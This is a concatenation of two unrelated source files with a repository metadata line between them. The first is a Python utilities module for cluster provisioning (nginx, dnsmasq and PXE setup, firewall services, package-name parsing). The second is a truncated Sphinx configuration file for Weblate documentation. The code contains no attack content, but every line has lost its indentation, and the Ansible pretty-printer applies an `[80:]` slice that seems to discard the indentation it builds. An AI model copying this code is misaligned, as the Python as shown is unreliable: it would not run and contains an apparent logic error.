allow_none=True, allow_retry=True)
if ch != 'R':
return src_path
else:
ch, src_path = get_selection(resp, prompt='Select a source file: ',
allow_none=True, allow_retry=True)
if ch != 'R':
return src_path
def get_file_path(filename='/home'):
"""Interactive search and selection of a file path.
Returns:
path to file or None
"""
print(bold('\nFile search hints:'))
print('/home/user1/abc.* Search for abc.* under home/user1/')
print('/home/user1/**/abc.* Search recursively for abc.* under '
'/home/user1/')
print('/home/user1/myfile[56].2 Search for myfile5.2 or myfile6.2 under '
'/home/user1/')
print('/home/user1/*/ List directories under /home/user1')
print()
maxl = 10
while True:
print("Enter a file name to search for ('L' to leave without making a "
"selction): ")
filename = rlinput(bold("File: "), filename)
print()
if filename == 'L' or filename == "'L'":
return None
files = glob(filename, recursive=True)
if files:
print(bold(f'Found {len(files)} matching'))
if len(files) > maxl:
print(f'\nSearch returned more than {maxl} items. Showing '
f'first {maxl}')
                files = files[:maxl]
choices = [str(i + 1) for i in range(len(files))]
choices.append('S')
choices.append('L')
files.append('Search again')
files.append('Leave without selecting')
ch, item = get_selection(files, choices)
print()
if item is not None and os.path.isfile(item):
print(f'\n{item}')
if get_yesno("Confirm selection: ", default='y'):
return item
else:
item = 'Search again'
elif item == 'Leave without selecting':
return None
if item != 'Search again':
filename = item
def ansible_pprint(ansible_output):
"""Ansible pretty print
Args:
ansible_output (str): Raw ansible output
Returns:
str: Ansible output formatted for visual parsing
"""
pretty_out = ""
indent_str = " "
indentation = ""
for item in ['{', '}']:
ansible_output = ansible_output.replace(f'{item}', f'\n{item}')
ansible_output = ansible_output.replace(': ["', ':\n["')
ansible_output = ansible_output.replace('\\r\\n"', '"')
ansible_output = ansible_output.replace('\\r\\n', '\n')
ansible_output = ansible_output.replace('\\n', '\n')
ansible_output = ansible_output.replace('\\r', '\n')
index_indent = False
for line in ansible_output.splitlines():
for element in line.split(','):
element = element.lstrip()
if element.startswith('{'):
pretty_out += indentation + "{\n"
indentation += indent_str
element = element[1:]
elif element.startswith('['):
indentation += indent_str
elif element.endswith('}'):
indentation = indentation[len(indent_str):]
if element != '':
pretty_out += indentation[80:] + element + "\n"
if element.count("\"") == 3:
index_indent = True
index = element.find("\"")
index = element.find("\"", index + 1)
index = element.find("\"", index + 1)
indentation += index * ' '
if element.endswith(']'):
indentation = indentation[len(indent_str):]
elif index_indent and element.endswith('"'):
indentation = indentation[index:]
index_indent = False
return pretty_out
def get_col_pos(tbl, hdrs, row_char='-'):
"""Gets the indices for the column positions in a text table
Inputs:
tbl (str): Text table with rows terminated with '\n'
hdrs (tuple of str): Each element of the tuple is a column header. Note
        that hdrs are treated as regular expressions. Characters such as
'([{)}]' need to be escaped with a '\'.
row_char (scalar str): Character used in the table row which separates
the headers from the table rows
For example, for the table below, the following call;
    get_col_pos(tbl, ('col 1', 'col 2', 'last col'), '-')
will return;
{'col 2': (10, 18), 'col 1': (0, 8), 'last col': (20, 30)}
tbl:
'Data from somewhere with a table\n'
'this data has a table with a my col 1, a my col 2, and a last col\n'
'\n'
    '          my col 2\n'
    'my col 1  wraps     last col\n'
    '--------  --------  ----------\n'
    'abcdef    ijklm     pqrstuvwxy'
"""
log = logger.getlogger()
tbl = tbl.splitlines()
hdr_span = {}
col_idx = {}
for row in tbl:
dashes_span = re.search(fr'{row_char}+\s+{row_char}+', row)
if dashes_span:
dashes_span = list(re.finditer(r'-+', row))
col_span = [x.span() for x in dashes_span]
break
for hdr in hdrs:
idx = re.search(hdr, row, re.IGNORECASE)
if idx:
hdr_span[hdr] = idx.span()
    log.debug(f'Separator row: {repr(row)}')
for hdr in hdr_span:
for col in col_span:
col_idx[hdr] = (0, 0)
if hdr_span[hdr][0] >= col[0] and hdr_span[hdr][1] <= col[1]:
col_idx[hdr] = col
break
return col_idx
def nginx_modify_conf(conf_path, directives={}, locations={}, reload=True,
clear=False):
"""Create/modify nginx configuration file
Directives are defined in a dictionary, e.g.:
directives={'listen': 80', 'server_name': 'powerup'}
Locations are defined in a dictionary with values as strings or
lists, e.g.:
locations={'/': ['root /srv', 'autoindex on'],
'/cobbler': 'alias /var/www/cobbler'}
*note: Semicolons (;) are auto added if not present
Args:
conf_path (str): Path to nginx configuration file
directives (dict, optional): Server directives
locations (dict, optional): Location definitions
reload (bool, optional): Reload nginx after writing config
clear (bool, optional): Remove any existing configuration data
Returns:
int: Return code from nginx syntax check ('nginx -t')
If syntax check rc=0 and reload=True the return code
from 'systemctl restart nginx.service'
"""
collecting_directive_data = False
collecting_location_data = False
current_location = None
if not clear and os.path.isfile(conf_path):
LOG.debug(f"Loading existing nginx config: '{conf_path}")
with open(conf_path, 'r') as file_object:
for line in file_object:
if 'server {' in line:
collecting_directive_data = True
elif not line.strip():
continue # continue if blank line
elif 'location' in line:
collecting_directive_data = False
current_location = line.strip()[9:-2]
if current_location not in locations:
collecting_location_data = True
locations[current_location] = []
else:
current_location = None
elif '}' in line and collecting_location_data:
collecting_location_data = False
current_location = None
elif collecting_location_data:
locations[current_location].append(line.strip())
elif '}' in line and collecting_directive_data:
collecting_directive_data = False
elif collecting_directive_data:
data_split = line.split(maxsplit=1)
if data_split[0] not in directives:
directives[data_split[0]] = data_split[1].strip()
LOG.debug(f"Writing nginx config: '{conf_path}")
with open(conf_path, 'w') as file_object:
file_object.write('server {\n')
for key, value in directives.items():
if not value.endswith(';'):
value = value + ';'
file_object.write(f' {key} {value}\n')
for key, value_list in locations.items():
file_object.write(f' location {key} ' + '{\n')
if type(value_list) is str:
value_list = value_list.split('\n')
for value in value_list:
if not value.endswith(';'):
value = value + ';'
file_object.write(f' {value}\n')
file_object.write(' }\n')
file_object.write('}\n')
cmd = (f'nginx -t')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('Nginx configuration check failed')
elif reload:
cmd = ('systemctl restart nginx.service')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('Nginx failed to start')
return rc
def dnsmasq_add_dhcp_range(dhcp_range,
lease_time='1h',
conf_path='/etc/dnsmasq.conf',
reload=True):
"""Add DHCP range to existing dnsmasq configuration
Args:
dhcp_range (str, optional): Range of IP addresses to lease to clients
formatted as "<start_ip>,<end_ip>"
lease_time (str, optional): Time duration of IP leases
conf_path (str, optional): Path to dnsmasq configuration file
reload (bool, optional): Reload dnsmasq after writing config
Returns:
        int: Return code from dnsmasq syntax check ('dnsmasq --test')
If syntax check rc=0 and reload=True the return code
from 'systemctl restart dnsmasq.service'
"""
append_line(conf_path, f'dhcp-range={dhcp_range},{lease_time}',
check_exists=True)
cmd = (f'dnsmasq --test')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('dnsmasq configuration check failed')
elif reload:
cmd = ('systemctl restart dnsmasq.service')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.error('dnsmasq service restart failed')
return rc
def dnsmasq_config_pxelinux(interface=None,
dhcp_range=None,
lease_time='1h',
default_route=None,
tftp_root=None,
disable_dns=False,
conf_path='/etc/dnsmasq.conf',
reload=True):
"""Create dnsmasq configuration to support PXE boots
    *note*: This will overwrite any existing configuration located at
'conf_path'!
Args:
interface (str, optional): Only listen for requests on given interface
dhcp_range (str, optional): Range of IP addresses to lease to clients
formatted as "<start_ip>,<end_ip>"
lease_time (str, optional): Time duration of IP leases
default_route (str, optional): IP pushed to clients as default route
tftp_root (str, optional): TFTP root directory path
disable_dns (bool, optional): Disable DNS functionality
conf_path (str, optional): Path to dnsmasq configuration file
reload (bool, optional): Reload dnsmasq after writing config
Returns:
        int: Return code from dnsmasq syntax check ('dnsmasq --test')
If syntax check rc=0 and reload=True the return code
from 'systemctl restart dnsmasq.service'
"""
if tftp_root is None:
if 'rhel' in linux_distribution(full_distribution_name=False):
tftp_root = '/var/lib/tftpboot'
if 'ubuntu' in linux_distribution(full_distribution_name=False):
tftp_root = '/tftpboot'
backup_file(conf_path)
with open(conf_path, 'w') as file_object:
file_object.write(
"# POWER-Up generated configuration file for dnsmasq\n\n")
if interface is not None:
file_object.write(f"interface={interface}\n\n")
file_object.write(dedent(f"""\
dhcp-lease-max=1000
dhcp-authoritative
dhcp-boot=pxelinux.0
enable-tftp
tftp-root={tftp_root}
user=root
\n"""))
if default_route is not None:
file_object.write(f"dhcp-option=3,{default_route}\n\n")
if dhcp_range is not None:
file_object.write(f"dhcp-range={dhcp_range},{lease_time}\n")
if disable_dns:
file_object.write("port=0\n")
cmd = (f'dnsmasq --test')
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.warning('dnsmasq configuration check failed')
elif reload:
cmd = 'systemctl enable dnsmasq.service'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
LOG.error('Failed to enable dnsmasq service')
cmd = 'systemctl restart dnsmasq.service'
stdout, stderr, rc = sub_proc_exec(cmd)
LOG.debug(f"Command: \'{cmd}\'\nstdout: \'{stdout}\'\n"
f"stderr: \'{stderr}\'\nrc: {rc}")
if rc != 0:
LOG.error('dnsmasq service restart failed')
return rc
def pxelinux_set_default(server,
kernel,
initrd,
kickstart=None,
kopts=None,
dir_path=None):
"""Create default pxelinux profile
This function assumes that the server is hosting the kernel,
initrd, and kickstart (if specified) over http. The default
'dir_path' requires root access.
Args:
server (str): IP or hostname of http server hosting files
kernel (str): HTTP path to installer kernel
initrd (str): HTTP path to installer initrd
kickstart (str, optional): HTTP path to installer kickstart
kopts (str, optional): Any additional kernel options
dir_path (str, optional): Path to pxelinux directory
"""
if dir_path is None:
if 'rhel' in linux_distribution(full_distribution_name=False):
dir_path = '/var/lib/tftpboot/pxelinux.cfg/'
if 'ubuntu' in linux_distribution(full_distribution_name=False):
dir_path = '/tftpboot/pxelinux.cfg/'
kopts_base = (f"ksdevice=bootif lang= kssendmac text")
if kickstart is not None:
if 'ubuntu' in kernel.lower():
ks_key = 'url'
else:
ks_key = 'ks'
kopts_base += f" {ks_key}=http://{server}/{kickstart}"
if kopts is not None:
kopts = kopts_base + f" {kopts}"
else:
kopts = kopts_base
default = os.path.join(dir_path, 'default')
os.makedirs(dir_path, exist_ok=True)
with open(default, 'w') as file_object:
file_object.write(dedent(f"""\
DEFAULT {kernel.split('/')[1]}
LABEL local
MENU LABEL (local)
MENU DEFAULT
LOCALBOOT -1
LABEL {kernel.split('/')[1]}
MENU LABEL PXE Install: {kernel.split('/')[1]}
KERNEL http://{server}/{kernel}
INITRD http://{server}/{initrd}
IPAPPEND 2
APPEND {kopts}
"""))
def pxelinux_set_local_boot(dir_path=None):
"""Disable PXE install by setting boot device to 'local'
Args:
dir_path (str, optional): Path to pxelinux directory
"""
if dir_path is None:
if 'rhel' in linux_distribution(full_distribution_name=False):
dir_path = '/var/lib/tftpboot/pxelinux.cfg/'
if 'ubuntu' in linux_distribution(full_distribution_name=False):
dir_path = '/tftpboot/pxelinux.cfg/'
replace_regex(os.path.join(dir_path, 'default'),
r'^DEFAULT.*$', 'DEFAULT local')
def firewall_add_services(services):
"""Add services to be allowed in firewall rules
Args:
services (str or list): Service(s) to be permanently allowed
Returns:
int: Binary error code
"""
if type(services) is str:
services = [services]
fw_err = 0
if 'rhel' in linux_distribution(full_distribution_name=False):
firewall_service = 'firewalld.service'
firewall_enable_cmd = 'firewall-cmd --permanent --add-service='
firewall_reload_cmd = 'firewall-cmd --reload'
elif 'ubuntu' in linux_distribution(full_distribution_name=False):
firewall_service = 'ufw.service'
firewall_enable_cmd = 'ufw allow '
firewall_reload_cmd = 'true'
return 0 # TODO: Need to add firewall configuration for Ubuntu
cmd = f'systemctl status {firewall_service}'
resp, err, rc = sub_proc_exec(cmd)
if 'Active: active (running)' in resp.splitlines()[2]:
LOG.debug('Firewall is running')
else:
cmd = f'systemctl enable {firewall_service}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
fw_err += 1
LOG.error('Failed to enable firewall service')
cmd = f'systemctl start {firewall_service}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
fw_err += 10
LOG.error('Failed to start firewall')
for service in services:
cmd = f'{firewall_enable_cmd}{service}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
fw_err += 100
LOG.error(f'Failed to enable {service} service on firewall')
resp, err, rc = sub_proc_exec(firewall_reload_cmd)
if 'success' not in resp:
fw_err += 1000
LOG.error('Error attempting to restart firewall')
return fw_err
def extract_iso_image(iso_path, dest_dir):
"""Extract ISO image into directory
If a (non-empty) directory matching the iso file already exists in
the destination directory extraction is not attempted.
Args:
iso_path (str): Path to ISO file
dest_dir (str): Path to an existing directory that the ISO will
be extracted into. A subdirectory matching the
image filename will be created.
Returns:
tuple: ('str: Relative path to kernel',
'str: Relative path to initrd')
Raises:
UserException: iso_path is not a valid file path
iso_path does not end in '.iso'
can't find kernel or initrd in extracted image
"""
if not os.path.isfile(iso_path):
raise UserException(f"Invalid iso_path: '{iso_path}")
elif not iso_path.lower().endswith('.iso'):
raise UserException(f"File does not end with '.iso': '{iso_path}'")
name = os.path.basename(iso_path)[:-4]
iso_dir = os.path.join(dest_dir, name)
if not os.path.isdir(iso_dir):
os.makedirs(iso_dir)
if len(os.listdir(iso_dir)) == 0:
bash_cmd(f'xorriso -osirrox on -indev {iso_path} -extract / {iso_dir}')
bash_cmd(f'chmod 755 {iso_dir}')
filename_parsed = {item.lower() for item in name.split('-')}
kernel = None
initrd = None
if {'ubuntu', 'amd64'}.issubset(filename_parsed):
sub_path = 'install/netboot/ubuntu-installer/amd64'
kernel = os.path.join(name, sub_path, 'linux')
initrd = os.path.join(name, sub_path, 'initrd.gz')
if not os.path.isfile(kernel):
sub_path = 'casper'
kernel = os.path.join(name, sub_path, 'vmlinux')
initrd = os.path.join(name, sub_path, 'initrd')
elif {'ubuntu', 'ppc64el'}.issubset(filename_parsed):
sub_path = 'install/netboot/ubuntu-installer/ppc64el'
kernel = os.path.join(name, sub_path, 'vmlinux')
initrd = os.path.join(name, sub_path, 'initrd.gz')
elif ({'rhel', 'x86_64'}.issubset(filename_parsed) or
{'centos', 'x86_64'}.issubset(filename_parsed)):
sub_path = 'images/pxeboot'
kernel = os.path.join(name, sub_path, 'vmlinuz')
initrd = os.path.join(name, sub_path, 'initrd.img')
elif ({'rhel', 'ppc64le'}.issubset(filename_parsed) or
{'centos', 'ppc64le'}.issubset(filename_parsed)):
sub_path = 'ppc/ppc64'
kernel = os.path.join(name, sub_path, 'vmlinuz')
initrd = os.path.join(name, sub_path, 'initrd.img')
if not os.path.isfile(os.path.join(dest_dir, kernel)):
kernel = None
if not os.path.isfile(os.path.join(dest_dir, initrd)):
initrd = None
# If kernel or initrd isn't in the above matrix search for them
if kernel is None or initrd is None:
kernel_names = {'linux', 'vmlinux', 'vmlinuz'}
initrd_names = {'initrd.gz', 'initrd.img', 'initrd'}
for dirpath, dirnames, filenames in os.walk(iso_dir):
if kernel is None and not kernel_names.isdisjoint(set(filenames)):
rel_dir = os.path.relpath(dirpath, dest_dir)
kernel = (os.path.join(
rel_dir, kernel_names.intersection(set(filenames)).pop()))
if initrd is None and not initrd_names.isdisjoint(set(filenames)):
rel_dir = os.path.relpath(dirpath, dest_dir)
initrd = (os.path.join(
rel_dir, initrd_names.intersection(set(filenames)).pop()))
if kernel is not None and initrd is not None:
break
if kernel is None or initrd is None:
raise UserException("Unable to find kernel and/or initrd in ISO image:"
f" kernel: '{kernel}' initrd: '{initrd}'")
return kernel, initrd
def timestamp():
return datetime.datetime.now().strftime("%d-%h-%Y-%H-%M-%S")
def sha1sum(file_path):
""" Calculate sha1 checksum of single file
Args:
file_path (str): Path to file
Returns:
str: sha1 checksum
"""
sha1sum = hashlib.sha1()
with open(file_path, 'rb') as file_object:
for block in iter(lambda: file_object.read(sha1sum.block_size), b''):
sha1sum.update(block)
return sha1sum.hexdigest()
def md5sum(file_path):
""" Calculate md5 checksum of single file
Args:
file_path (str): Path to file
Returns:
str: md5 checksum
"""
md5sum = hashlib.md5()
with open(file_path, 'rb') as file_object:
for block in iter(lambda: file_object.read(md5sum.block_size), b''):
md5sum.update(block)
return md5sum.hexdigest()
def clear_curses():
""" Curses cleanup
Reset terminal normal mode after running curses application
"""
from curses import nocbreak, echo, endwin
nocbreak()
echo()
endwin()
def interact(**kwargs):
""" Wrapper for code.interact with curses cleanup
Args:
**kwargs: See code.interact documentation
"""
import code
clear_curses()
code.interact(**kwargs)
def breakpoint():
""" Wrapper for pdb.set_trace() with curses cleanup
Note: python>=3.7 includes a built-in 'breakpoint()'
"""
from pdb import set_trace
from _curses import error
try:
clear_curses()
except error:
pass
set_trace()
def parse_pypi_filenames(filenames):
"""Returns the basename and version for a pypi package name filelist.
Args:
    filenames(list): Package filenames of form name-ver-bld.type. Package
    names can have dashes or underscores. Filenames can also have underscores
    or dashes which don't always match the package names.
    Returns:
    dict of form {name: {'ver_bld': [(version, build), ...]}} keyed by the
    lower cased package name.
"""
if isinstance(filenames, list):
_dict = {}
for _file in filenames:
if _file.endswith('.whl') or _file.endswith('.gz') or \
_file.endswith('.bz2') or _file.endswith('.zip'):
fnd = re.search(r'[-=]((\d+\.)+\d+)[-.]', _file)
if fnd:
ver = fnd.group(1)
name = _file[:fnd.span()[0]] # strip trailing eq_eq chars
name = name.lower()
bld = _file[fnd.span()[1]:]
else:
ver = ''
bld = ''
name = _file
LOG.error(f'Unable to extract version from {_file}')
if name in _dict:
_dict[name]['ver_bld'].append((ver, bld))
else:
_dict[name] = {}
_dict[name]['ver_bld'] = [(ver, bld)]
return _dict
def parse_conda_filenames(filenames):
"""Returns the basename, version and release for a conda package file list.
    list elements must be of form <name>-<version>-<build>.tar.bz2. Dashes must
    appear on both sides of the version and may appear in the name, but nowhere
    else.
    Args:
    filenames(list): list of filenames.
    Returns:
    dictionary of form: {basename: {'ver_bld': [(version, build), ...]}} when
    filenames is a list, or a (name, version, build) tuple when filenames is a
    single string.
"""
def get_parts(filename):
"""Returns the basename, version and release for a conda package file.
of the form basename-ver-release.tar.bz2.
"""
filename = filename.strip()
if not '.tar.bz2' == filename[-8:]:
LOG.error(f'Improper conda filename: {filename}. Missing ".tar.bz2"')
name = ''
version = ''
build = ''
else:
filename = filename[:-8]
_split = filename.rsplit('-', 1)
build = _split[-1]
_split = _split[0].rsplit('-', 1)
version = _split[-1]
name = _split[0]
return name, version, build
if isinstance(filenames, list):
_dict = {}
for _file in filenames:
name, version, build = get_parts(_file)
if name not in _dict:
_dict[name] = {}
_dict[name]['ver_bld'] = []
_dict[name]['ver_bld'].append((version, build))
return _dict
elif isinstance(filenames, str):
return get_parts(filenames)
def get_rpm_info(filelist, _dir):
def get_parts(info):
name = ep = ver = rel = ''
if 'Name' in info:
name = info.split('Name', 1)[-1].lstrip(' :')
name = name[:name.index('\n')]
else:
LOG.error(f'Name not found in rpm package info {info}')
if 'Epoch' in info:
ep = info.split('Epoch', 1)[-1].lstrip(' :')
ep = ep[:ep.index('\n')]
if 'Version' in info:
ver = info.split('Version', 1)[-1].lstrip(' :')
ver = ver[:ver.index('\n')]
if 'Release' in info:
rel = info.split('Release', 1)[-1].lstrip(' :')
rel = rel[:rel.index('\n')]
return name, ep, ver, rel
if isinstance(filelist, list):
_dict = {}
for _file in filelist:
path = os.path.join(_dir, _file)
cmd = f'rpm -qip {path}'
resp, err, rc = sub_proc_exec(cmd)
if rc != 0:
LOG.error(f'Error querying package {path}')
name, ep, ver, rel = get_parts(resp)
if name in _dict:
if ep > _dict[name]['ep']:
_dict[name]['ver'] = ver
_dict[name]['rel'] = rel
_dict[name]['ep'] = ep
elif rel > _dict[name]['rel'] and ver == _dict[name]['ver']:
_dict[name]['rel'] = rel
elif ver > _dict[name]['ver']:
_dict[name]['ver'] = ver
_dict[name]['rel'] = rel
else:
_dict[name] = {}
_dict[name]['ep'] = ep
_dict[name]['ver'] = ver
_dict[name]['rel'] = rel
return _dict
def parse_rpm_filenames(filename, form='list'):
""" returns the basename, epoch, version and release lvl for an rpm file
If form is set to 'list', the components are returned as lists.
If filename is a string, the components are returned as strings.
if form is set to 'dict', a dictionary is returned. The keys are the
basenames, the values are a dictionary with keys: ep, ver, rel.
{basename: {'ep': epoch, 'ver': version, 'rel': release}} where
epoch, version and release are strings.
Args:
filename (str or list)
form
    Returns:
    basename, epoch, version and release (as strings, lists or a dict,
    depending on the input type and 'form').
"""
def get_parts(_filename):
""" Return a basename, epoch, version and release from a filename of
form: basename-epoch:version-release.type.rpm
The trailing .rpm is optional. If only a basename is present,
the epoch, version and release are returned as empty strings.
The parsing algorithm assumes that the filenames reasonably follow
the rpm naming convention: dashes are only allowed in the basename,
not in the epoch, version or release, and dashes separate the version
from the release level and the basename from the epoch:version where
epoch is optional. If epoch is present it is separated from the release
by a ':'. The algorithm parses right to left.
"""
        if _filename.endswith('.rpm'):  # strip the suffix (rstrip would drop a char set)
            _filename = _filename[:-4]
_file_nt = _filename.rsplit('.', 1)[0] # drop the type (ie ppc64le)
if _filename != _file_nt:
tmp = _file_nt.rsplit('-', 1)
if len(tmp) > 1:
rel = tmp[-1]
else:
rel = ''
_file_nr = tmp[0]
tmp = _file_nr.rsplit('-', 1)
if len(tmp) > 1:
ver = tmp[1].split(':')[-1]
if ':' in tmp[-1]:
ep = tmp[1].split(':')[0]
else:
ep = ''
else:
ep = ''
ver = ''
basename = tmp[0]
else: # basename only
            basename = _filename
ver = ''
rel = ''
ep = ''
return basename, ep, ver, rel
if isinstance(filename, str):
return get_parts(filename)
elif form == 'list':
basename = []
version = []
release = []
epoch = []
for _file in filename:
bn, ep, ver, rel = get_parts(_file)
basename.append(bn)
version.append(ver)
release.append(rel)
epoch.append(ep)
return basename, epoch, version, release
elif form == 'dict':
_dict = {}
for _file in filename:
basename, ep, ver, rel = get_parts(_file)
if basename not in _dict:
_dict[basename] = {}
_dict[basename]['ver'] = ver
_dict[basename]['rel'] = rel
_dict[basename]['ep'] = ep
else: # if already in dict, replace if newer
if ep > _dict[basename]['ep']:
_dict[basename]['ver'] = ver
_dict[basename]['rel'] = rel
_dict[basename]['ep'] = ep
elif rel > _dict[basename]['rel'] and ver == _dict[basename]['ver']:
_dict[basename]['rel'] = rel
elif ver > _dict[basename]['ver']:
_dict[basename]['ver'] = ver
_dict[basename]['rel'] = rel
# print(i, _file, basename, ver, rel)
return _dict
else:
        epoch = None
        basename = None
        version = None
        release = None
return basename, epoch, version, release
def lscpu():
""" Get 'lscpu' output as dictionary
Returns:
dict: Output from 'lscpu'
"""
stdout, stderr, returncode = sub_proc_exec('lscpu')
lscpu_dict = {}
for line in stdout.splitlines():
split = line.split(':', 1)
lscpu_dict[split[0].strip()] = split[1].strip()
return lscpu_dict
def load_package_list_from_file(file_path):
""" Read and format software package list from file
Each software package should be listed on a separate line. This
function is designed to process output from
'pip list --format freeze' or lists of yum packages.
Args:
file_path (str): Path to package list text file
Returns:
str: List of packages separated by single spaces
"""
pkg_list = ''
with open(file_path) as file_object:
for line in file_object:
pkg_list += f' {line.rstrip()}'
return pkg_list.lstrip()
def get_and_create_dir(path=None):
""" Prompt for dir path and create it if needed
Prompt loops until valid path is entered.
Args:
path (str, optional): Text pre-loaded into prompt. If 'None' it
is set to current working dir.
Returns:
str: Validated directory path
"""
if path is None:
path = os.getcwd()
while True:
path = rlinput('Enter an absolute directory location: ', path)
if os.path.exists(path):
if os.path.isdir(path):
return path
else:
print(f"'{path}' is not a directory!")
elif get_yesno(f"'{path}' does not exist, create it? ", default='y'):
try:
os.makedirs(path)
return path
except OSError as exc:
print(f"Error: Failed to create '{path}' - {exc}")
| open-power-ref-design-toolkit/cluster-genesis | scripts/python/lib/utilities.py | Python | apache-2.0 | 68,079 |
# -*- coding: utf-8 -*-
#
# Weblate documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 7 14:48:43 2012.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext"))
)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'djangodocs',
'sphinxcontrib.httpdomain',
'sphinx.ext.graphviz',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Weblate'
copyright = '2012 - 2016, Michal Čihař'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.9'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Weblatedoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Weblate.tex', 'Weblate Documentation',
'Michal Čihař', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('wlc', 'wlc', 'Weblate Client Documentation',
['Michal Čihař'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
